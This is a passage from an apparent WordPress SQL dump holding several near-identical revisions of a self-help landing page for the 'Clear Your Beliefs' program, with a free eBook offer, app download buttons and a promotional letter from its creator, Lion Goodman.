(1548, 2, '2014-10-20 02:47:15', '2014-10-20 07:47:15', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center">Start Clearing Whatever\nIs In The Way Right\nNow<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:47:15', '2014-10-20 07:47:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1549, 2, '2014-10-20 02:52:59', '2014-10-20 07:52:59', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center;font-size: 14px">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 02:52:59', '2014-10-20 07:52:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1551, 2, '2014-10-20 18:37:31', '2014-10-20 23:37:31', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center;margin-bottom: -5px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs How and Why It Works\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:37:31', '2014-10-20 23:37:31', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1552, 2, '2014-10-20 18:44:59', '2014-10-20 23:44:59', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p><p>What You Can Accomplish with Clear Your Beliefs </p>Release hurt and pain from the pastClear resistance to taking actionOpen to new possibilitiesEliminate blocks to manifestationFind your true purposeDelete what’s been holding you back<p> </p>Change your personality styleOpen to deeper, more profound loveRecognize your spiritual natureBecome less reactive, more calmRediscover the source of your personal power<p> </p><p>How and Why It Works</p>Beliefs are the major cause of upset and unhappinessCYB clears beliefs at the core of the psyche, where they liveAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)You take charge and decide what you want to believeYou’re guided gently, step-by-step, through the entire processYou decide how far to go, and what changes to make<p>[/su_tab][/su_tabs]</p>\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:44:59', '2014-10-20 23:44:59', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1553, 2, '2014-10-20 18:46:20', '2014-10-20 23:46:20', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>What You Can Accomplish with Clear Your Beliefs\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\nHow and Why It Works\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n[/su_tab][/su_tabs]\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:46:20', '2014-10-20 23:46:20', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1554, 2, '2014-10-20 18:47:15', '2014-10-20 23:47:15', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p><em>What You Can Accomplish with Clear Your Beliefs</em>\n\nRelease hurt and pain from the past\nClear resistance to taking action\nOpen to new possibilities\nEliminate blocks to manifestation\nFind your true purpose\nDelete what’s been holding you back\n\nChange your personality style\nOpen to deeper, more profound love\nRecognize your spiritual nature\nBecome less reactive, more calm\nRediscover the source of your personal power\n\n<em>How and Why It Works</em>\n\nBeliefs are the major cause of upset and unhappiness\nCYB clears beliefs at the core of the psyche, where they live\nAll 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)\nYou take charge and decide what you want to believe\nYou’re guided gently, step-by-step, through the entire process\nYou decide how far to go, and what changes to make\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\nCopyright 2014 Clear Your Beliefs', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-20 18:47:15', '2014-10-20 23:47:15', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1555, 2, '2014-10-20 18:49:15', '2014-10-20 23:49:15', '<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />[Form id="10"] Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;"><strong>DOWNLOAD THE FREE iClearIt APP</strong></p>\n\n<p style="text-align: center; font-size: 14px;">Start Clearing Whatever Is In The Way Right Now\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nSpecial Program\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" 